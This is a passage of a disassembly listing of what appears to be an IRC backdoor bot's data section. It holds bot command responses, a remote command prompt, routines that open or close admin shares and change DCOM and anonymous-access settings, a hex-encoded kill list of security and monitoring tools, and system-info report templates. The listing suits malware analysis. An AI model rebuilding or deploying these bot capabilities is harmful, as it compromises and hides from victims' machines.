db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 4
dword_450404 dd 234032Dh, 274656Eh, 25202D03h, 68732073h, 3A657261h
; DATA XREF: sub_419737+89�o
dd 73252720h, 27h
unk_450420 db 2Dh ; - ; DATA XREF: sub_419737+AB�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_41992C+26�o
align 4
unk_45047C db 2Dh ; - ; DATA XREF: sub_41992C+76�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 4
aYes db 'Yes',0 ; DATA XREF: sub_41992C+B5�o
aNo db 'No',0 ; DATA XREF: sub_41992C+BC�o
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_41992C+D0�o
align 4
unk_4504C4 db 2Dh ; - ; DATA XREF: sub_419A4D+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 4
unk_4504E4 db 2Dh ; - ; DATA XREF: sub_419A4D+94�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 4
unk_450514 db 2Dh ; - ; DATA XREF: sub_419A4D+B6�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_419B93+50�o
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_419B93+81�o
align 4
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_419B93+AC�o
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_419B93+D4�o
aUnknown_2 db 'Unknown',0 ; DATA XREF: sub_419B93+104�o
aAdministrator db 'Administrator',0 ; DATA XREF: sub_419B93:loc_419C9E�o
align 10h
aUser_3 db 'User',0 ; DATA XREF: sub_419B93:loc_419CA5�o
align 4
aGuest db 'Guest',0 ; DATA XREF: sub_419B93:loc_419CAC�o
align 10h
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_419B93+125�o
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_419B93+14D�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_419B93+178�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_419B93+1A0�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_419B93+1CB�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_419B93+1F3�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_419B93+21E�o
align 4
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_419B93+246�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_419B93+271�o
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_419B93+299�o
align 10h
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_419B93+2C4�o
align 4
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_419B93+2EC�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_419B93+317�o
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_419B93+33F�o
align 10h
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_419B93+36A�o
align 4
unk_4506C4 db 2Dh ; - ; DATA XREF: sub_419B93+394�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_419F61+29�o
unk_45070C db 2Dh ; - ; DATA XREF: sub_419F61+7A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
aS_29 db ' %S',0 ; DATA XREF: sub_419F61+BA�o
align 4
unk_450738 db 2Dh ; - ; DATA XREF: sub_419F61:loc_41A04E�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_419F61+145�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_41A0D7+3B�o
align 10h
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_41A0D7:loc_41A11C�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_41A0D7:loc_41A126�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_41A0D7:loc_41A130�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_41A0D7:loc_41A13A�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_41A0D7:loc_41A144�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_41A0D7+89�o
align 4
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_41A0D7:loc_41A16A�o
align 4
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_41A0D7:loc_41A174�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_41A0D7:loc_41A17B�o
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_41A0D7:loc_41A182�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_41A0D7+CF�o
db ' the domain.',0
align 10h
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_41A0D7:loc_41A1AD�o
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_41A0D7:loc_41A1B4�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_41A0D7:loc_41A1BB�o
db 'ord policy requirement.)',0
align 4
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_41A0D7:loc_41A1D8�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_41A0D7:loc_41A1DF�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_41A0D7:loc_41A1E6�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_41A0D7:loc_41A1ED�o
align 10h
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_41A0D7:loc_41A1F4�o
align 10h
unk_450A40 db 2Dh ; - ; DATA XREF: sub_41A20B+81�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 4
dword_450A68 dd 234032Dh, 274656Eh, 25202D03h, 34032073h, 76726553h
; DATA XREF: sub_41A20B+AB�o
dd 3A037265h, 20532520h, 654D3403h, 67617373h, 203A0365h
dd 5325h, 0
dword_450A98 dd 7530h ; DATA XREF: sub_41A689+12�r
dword_450A9C dd 65676572h, 2E746964h, 657865h, 6F63736Dh, 6769666Eh
; DATA XREF: _2:off_450BE8�o
; _2:00450BEC�o
dd 6578652Eh, 0
dword_450AB8 dd 7374656Eh, 2E746174h, 657865h, 6C62736Dh, 2E747361h
; DATA XREF: _2:00450BF0�o _2:00450BF4�o
dd 657865h, 7270617Ah, 78652E6Fh, 65h, 7776616Eh, 652E3233h
dd 6578h, 6176616Eh, 32337770h, 6578652Eh, 0
dword_450AF8 dd 656E6F7Ah, 72616C61h, 78652E6Dh, 65h, 636E6977h, 32336766h
; DATA XREF: _2:00450C04�o
dd 6578652Eh, 6B736174h, 2E6E6F6Dh, 657865h, 646E6150h
dd 45564161h, 6E69676Eh, 78652E65h, 65h, 69737973h, 2E6F666Eh
dd 657865h, 7663736Dh, 2E323362h, 657865h, 4C42534Dh, 2E545341h
dd 657865h, 6B656574h, 2E736469h, 657865h, 696E6550h, 2E323373h
dd 657865h, 61656262h, 2E656C67h, 657865h, 4D737953h, 50586E6Fh
dd 6578652Eh, 0
dword_450B8C dd 756E6977h, 652E6470h, 6578h, 736E6977h, 652E7379h, 6578h
; DATA XREF: _2:00450C2C�o _2:00450C30�o
dd 74617373h, 78652E65h, 65h, 65746172h, 6578652Eh, 0
dword_450BBC dd 75643364h, 74616470h, 78652E65h, 65h, 6E757269h, 78652E34h
; DATA XREF: _2:00450C3C�o
dd 65h, 72313169h, 346E3435h, 6578652Eh, 0
off_450BE8 dd offset dword_450A9C ; DATA XREF: sub_41A334+D1�r
dd offset dword_450A9C+0Ch
dd offset dword_450AB8
dd offset dword_450AB8+0Ch
dd offset dword_450AB8+18h
dd offset dword_450AB8+24h
dd offset dword_450AB8+30h
dd offset dword_450AF8
dd offset dword_450AF8+10h
dd offset dword_450AF8+28h
dd offset dword_450AF8+3Ch
dd offset dword_450AF8+48h
dd offset dword_450AF8+54h
dd offset dword_450AF8+60h
dd offset dword_450AF8+6Ch
dd offset dword_450AF8+78h
dd offset dword_450AF8+84h
dd offset dword_450B8C
dd offset dword_450B8C+0Ch
dd offset dword_450B8C+18h
dd offset dword_450B8C+24h
dd offset dword_450BBC
dd offset dword_450BBC+10h
dd offset dword_450BBC+1Ch
aSedebugprivi_1 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A334+5A�o
align 4
aSD db ' %s (%d)',0 ; DATA XREF: sub_41A334+17A�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_41A334+188�o
align 4
aSD_1 db ' %s (%d)',0 ; DATA XREF: sub_41A334+19C�o
align 10h
aSedebugprivi_2 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A334+204�o
align 4
unk_450C94 db 2Dh ; - ; DATA XREF: sub_41A574+19�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
unk_450CB4 db 2Dh ; - ; DATA XREF: sub_41A574+86�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 4
unk_450CD8 db 2Dh ; - ; DATA XREF: sub_41A574:loc_41A601�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 4
aPrivmsgSS_2 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_41A711+33�o
aS_18 db '%s',0 ; DATA XREF: sub_41A711+4C�o
align 10h
unk_450D10 db 2Dh ; - ; DATA XREF: sub_41A798:loc_41A87E�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess',0Dh,0Ah,0
align 10h
unk_450D40 db 2Dh ; - ; DATA XREF: sub_41A798+10F�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 4
unk_450D68 db 2Dh ; - ; DATA XREF: sub_41A798:loc_41A8CA�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess.',0Dh,0Ah,0
aCmd_exe_0 db 'cmd.exe',0 ; DATA XREF: sub_41A8ED+20�o
unk_450DA0 db 2Dh ; - ; DATA XREF: sub_41A8ED+150�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteCommandP db '- Remote Command Prompt',0
align 4
unk_450DC4 db 2Dh ; - ; DATA XREF: sub_41A8ED+198�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 4
aIpc db 'IPC$',0 ; DATA XREF: _2:off_450E18�o
align 10h
aAdmin_1 db 'ADMIN$',0 ; DATA XREF: _2:00450E20�o
align 4
aC_0 db 'C$',0 ; DATA XREF: _2:00450E28�o
align 4
aC_1 db 'C:\',0 ; DATA XREF: _2:00450E2C�o
aD_2 db 'D$',0 ; DATA XREF: _2:00450E30�o
align 4
aD_3 db 'D:\',0 ; DATA XREF: _2:00450E34�o
off_450E18 dd offset aIpc ; DATA XREF: sub_41AB05:loc_41ACBA�r
; sub_41AB05+1C3�r ...
; "IPC$"
dword_450E1C dd 0 ; DATA XREF: sub_41AE2B:loc_41AFA6�r
dd offset aAdmin_1 ; "ADMIN$"
align 8
dd offset aC_0 ; "C$"
dd offset aC_1 ; "C:\\"
dd offset aD_2 ; "D$"
dd offset aD_3 ; "D:\\"
word_450E38 dw 4Eh ; DATA XREF: sub_41AB05+38�r
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_41AB05+54�o
align 4
dword_450E48 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+6C�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
dword_450E6C dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 64204D4Fh
; DATA XREF: sub_41AB05:loc_41AB78�o
dd 62617369h, 2E64656Ch, 0
dword_450E8C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+91�o
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_41AB05+ED�o
align 10h
dword_450ED0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+10C�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
dword_450F0C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05:loc_41AC18�o
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 10h
dword_450F40 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05:loc_41AC30�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
dword_450F7C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05:loc_41AC37�o
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_450FAC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+1D3�o
aShareSDeleted_ db '- Share ',27h,'%s',27h,' deleted.',0
align 10h
dword_450FD0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05:loc_41ACDF�o
aFailedToDelete db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
dword_450FFC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+263�o
aShareSDelete_0 db '- Share ',27h,'%S',27h,' deleted.',0
align 10h
dword_451020 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05:loc_41AD6F�o
aFailedToDele_0 db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_45104C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+2D1�o
aNetworkSharesD db '- Network shares deleted.',0
align 4
dword_451074 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AB05+2E7�o
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
word_4510A4 dw 59h ; DATA XREF: sub_41AE2B+38�r
align 4
aEnabledcom_0 db 'EnableDCOM',0 ; DATA XREF: sub_41AE2B+54�o
align 4
dword_4510B4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+6C�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
dword_4510D8 dd 234032Dh, 75636573h, 3026572h, 4344202Dh, 65204D4Fh
; DATA XREF: sub_41AE2B:loc_41AE9E�o
dd 6C62616Eh, 2E6465h
dword_4510F4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+91�o
aFailedToOpen_1 db '- Failed to open DCOM registry key.',0
aRestrictanon_0 db 'restrictanonymous',0 ; DATA XREF: sub_41AE2B+ED�o
align 4
dword_451138 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+108�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
dword_451178 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B:loc_41AF3A�o
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 10h
dword_4511B0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B:loc_41AF52�o
aFailedToOpen_2 db '- Failed to open IPC$ restriction registry key.',0
dword_4511EC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B:loc_41AF59�o
aAdvapi32_dll_1 db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_45121C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+1A0�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
dword_45123C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B:loc_41AFD2�o
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
aC_2 db '%c$',0 ; DATA XREF: sub_41AE2B+21B�o
aC_3 db '%c:\',0 ; DATA XREF: sub_41AE2B+22C�o
align 10h
dword_451270 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+26E�o
aShareSAdded__0 db '- Share ',27h,'%s',27h,' added.',0
dword_451290 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B:loc_41B0A0�o
aFailedToAddS_0 db '- Failed to add ',27h,'%s',27h,' share.',0
dword_4512B8 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+2C5�o
aNetworkSharesA db '- Network shares added.',0
dword_4512DC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AE2B+2DD�o
aNetapi32_dll_1 db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 10h
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41B161+DE�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
asc_451344 db 0Dh,0Ah,0 ; DATA XREF: sub_41B161+F2�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41B33E+15�o
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41B33E+1C�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41B33E+23�o
align 4
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41B33E+2A�o
align 4
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41B33E+31�o
align 4
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41B33E+38�o
align 4
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41B33E+3F�o
align 4
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41B33E+46�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41B33E+4D�o
align 10h
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41B33E+54�o
align 4
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41B33E+5B�o
align 4
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41B33E+62�o
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41B33E+69�o
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41B33E+70�o
align 4
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41B33E+77�o
align 4
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41B33E+7E�o
align 4
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41B33E+85�o
align 4
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41B33E+8C�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41B33E+93�o
align 4
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41B33E+9A�o
align 4
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41B33E+A1�o
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41B33E+A8�o
align 4
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41B33E+AF�o
align 4
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41B33E+B6�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41B33E+BD�o
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41B33E+C4�o
align 8
dword_4514F8 dd 234032Dh, 65657073h, 73657464h, 2D030274h, 75450220h
; DATA XREF: sub_41B33E+1A7�o
dd 65706F72h, 25203A02h, 626B2064h, 732F7469h, 53550220h
dd 203A0241h, 6B206425h, 2F746962h, 41022073h, 2616973h
dd 6425203Ah, 69626B20h, 20732F74h, 65764102h, 65676172h
dd 25203A02h, 626B2064h, 732F7469h, 0
dword_451558 dd 20646425h, 20686425h, 6D6425h ; DATA XREF: sub_41B51B+39�o
dword_451564 dd 3539h ; DATA XREF: sub_41B6C1+46�o
dword_451568 dd 544Eh ; DATA XREF: sub_41B6C1+5A�o
dword_45156C dd 3839h ; DATA XREF: sub_41B6C1+6C�o
dword_451570 dd 454Dh ; DATA XREF: sub_41B6C1+7E�o
dword_451574 dd 4B32h ; DATA XREF: sub_41B6C1+98�o
dword_451578 dd 5058h ; DATA XREF: sub_41B6C1+AA�o
a2003 db '2003',0 ; DATA XREF: sub_41B6C1+BA�o
align 4
a??? db '???',0 ; DATA XREF: sub_41B6C1:loc_41B784�o
aSS_6 db '%s (%s)',0 ; DATA XREF: sub_41B6C1+EB�o
word_451590 dw 3Fh ; DATA XREF: sub_41B6C1:loc_41B7C3�r
align 4
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41B6C1:loc_41B825�o
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41B6C1+192�o
aHhMmSs_0 db 'HH:mm:ss',0 ; DATA XREF: sub_41B6C1+1AE�o
align 8
dword_4515C8 dd 234032Dh, 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
; DATA XREF: sub_41B6C1+297�o
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
dword_4516A4 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h ; DATA XREF: sub_41B975+48�o
dword_4516B4 dd 6C616944h, 70752Dh ; DATA XREF: sub_41B975+5E�o
off_4516BC dd offset dword_4E414C ; DATA XREF: sub_41B975:loc_41B9E2�o
off_4516C0 dd offset loc_412F4D+1 ; DATA XREF: sub_41B975+77�o
off_4516C4 dd offset loc_412F4D+1 ; DATA XREF: sub_41B975+88�o
dword_4516C8 dd 234032Dh, 6974656Eh, 26F666Eh, 2202D03h, 65707954h
; DATA XREF: sub_41B975+AE�o
dd 25203A02h, 25282073h, 202E2973h, 20504902h, 72646441h
dd 2737365h, 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h
dd 7325203Ah, 2Eh
dword_45170C dd 2A2F2Ah ; DATA XREF: sub_41BA41+3B�o
dword_451710 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: sub_41BA41+192�o
dd 64657469h, 2Eh
unk_45172C db 2Dh ; - ; DATA XREF: sub_41BA41:loc_41BBDA�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 4
dword_451768 dd 234032Dh, 69736976h, 2D030274h, 766E4920h, 64696C61h
; DATA XREF: sub_41BA41+1A6�o
dd 4C525520h, 2Eh
unk_451784 db 2Dh ; - ; DATA XREF: sub_41BA41:loc_41BBF7�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 10h
unk_4517B0 db 2Dh ; - ; DATA XREF: sub_41BA41:loc_41BBFE�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 10h
dword_4517E0 dd 1 ; DATA XREF: sub_41BF80+10�r
; sub_41BF80+F2�r ...
dword_4517E4 dd 25h ; DATA XREF: sub_41BF80:loc_41BFCC�r
; sub_41BF80:loc_41C135�r ...
dword_4517E8 dd 0FFFFFFFFh ; DATA XREF: sub_41BF80+58�r
; sub_41C3F0+9E�r ...
byte_4517EC db 0FDh ; DATA XREF: sub_41BF80+2B7�r
; sub_41BF80+2D1�r ...
byte_4517ED db 0DDh ; DATA XREF: sub_41CA80+257�r
; sub_41CA80+39B�r ...
byte_4517EE db 0CDh ; DATA XREF: sub_41BF80+2F1�r
; sub_41C3F0+377�r
align 10h
off_4517F0 dd offset aFree ; DATA XREF: sub_41CA80+177�r
; sub_41CA80+1DD�r ...
; "Free"
dd offset dword_43C514+20h
dd offset dword_43C514+1Ch
dd offset dword_43C514+14h
dd offset dword_43C514+0Ch
align 10h
dword_451810 dd 173Fh ; DATA XREF: sub_41FFF0+B�r
dd 9875h, 9873h
off_45181C dd offset sub_420130 ; DATA XREF: sub_41E860+3�r
; sub_41E860+C�r
dd offset sub_420160
dd offset sub_420160
dword_451828 dd 1B3Fh ; DATA XREF: sub_420210+B�r
dword_45182C dd 19930520h, 4 dup(0) ; DATA XREF: sub_4207FD+2�o
; sub_420806+2�o
off_451840 dd offset sub_41E8C0 ; DATA XREF: sub_422270+22�r
dword_451844 dd 2 ; DATA XREF: sub_42FEE0+15�r
; sub_42FF30+86�r ...
off_451848 dd offset dword_4F3A20 ; DATA XREF: sub_4222D0+B3�o
; sub_422420+3�o ...
align 10h
dd offset dword_4F3A20
dd 101h
dword_451858 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4222D0+11C�w
dd 1000h, 0
dword_451868 dd 3 dup(0) ; DATA XREF: sub_427CE0+111�o
; sub_429C90:loc_429CE3�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_451888 dd 3 dup(0) ; DATA XREF: sub_427CE0+11A�o
; sub_429C90:loc_429CF5�o
dd 2, 0FFFFFFFFh, 83h dup(0)
dword_451AA8 dd 8 dup(0) ; DATA XREF: sub_422420+C�o
; sub_422490+C�o
dword_451AC8 dd 0FFFFFFFFh ; DATA XREF: sub_422610+80�o
; sub_422610+108�o ...
dword_451ACC dd 2 ; DATA XREF: _0:0042252E�r _0:00422549�r ...
dd 2 dup(4)
dword_451AD8 dd 0FFFFFFFFh ; DATA XREF: _0:00422590�r _0:0042259C�r ...
dd 2 dup(0FFFFFFFFh)
off_451AE4 dd offset aWarning ; DATA XREF: sub_4229A0+284�r
; "Warning"
dd offset aError ; "Error"
dd offset dword_43CDF4+8
dword_451AF0 dd 0 ; DATA XREF: sub_4231E0+1F�r
; sub_4231E0+44�r ...
off_451AF4 dd offset dword_4F3380 ; DATA XREF: sub_4231A0+29�r
; sub_4231E0+8F�r
dd 7 dup(0)
off_451B14 dd offset dword_4F33B0 ; DATA XREF: sub_4231A0+1C�r
; sub_4231E0:loc_423249�r
dd 3 dup(0)
off_451B24 dd offset dword_4F33C8 ; DATA XREF: sub_4231A0+F�r
; sub_4231E0+75�r
dd 3 dup(0)
off_451B34 dd offset byte_4F3398 ; DATA XREF: sub_4231A0+3�r
; sub_4231E0+82�r
dd 7 dup(0)
dd 0AA27F8h, 16h dup(0)
off_451BB0 dd offset sub_423610 ; DATA XREF: sub_41BF80+79�r
; sub_41C3F0+C1�r ...
align 8
off_451BB8 dd offset off_451BB8 ; DATA XREF: sub_425D50+F�o
; sub_425D50+7A�o ...
off_451BBC dd offset off_451BB8 ; DATA XREF: sub_425D50:loc_425DE6�r
; sub_425D50+9F�w ...
dd offset dword_451BD0
dd offset dword_451BD0
dword_451BC8 dd 0FFFFFFFFh ; DATA XREF: sub_425D50+6�r
; sub_425F30:loc_425F97�w
dd 0FFFFFFFFh
dword_451BD0 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: _2:00451BC0�o
; _2:00451BC4�o
off_453BD8 dd offset off_451BB8 ; DATA XREF: sub_425F30+17�r
; sub_425F30+28�w ...
dword_453BDC dd 1E0h ; DATA XREF: sub_4234C0+AE�r
; sub_423620+146�r ...
dd 10h
off_453BE4 dd offset word_453BEE ; DATA XREF: sub_41DF10+7C�r
; sub_41E610+2D�r ...
off_453BE8 dd offset word_453BEE ; DATA XREF: sub_434A80+2A4�w
; sub_434A80+35B�w ...
db 2 dup(0)
word_453BEE dw 20h ; DATA XREF: sub_434A80:loc_434DD1�o
; sub_434A80+35B�o ...
unicode 0, < ((((( H>
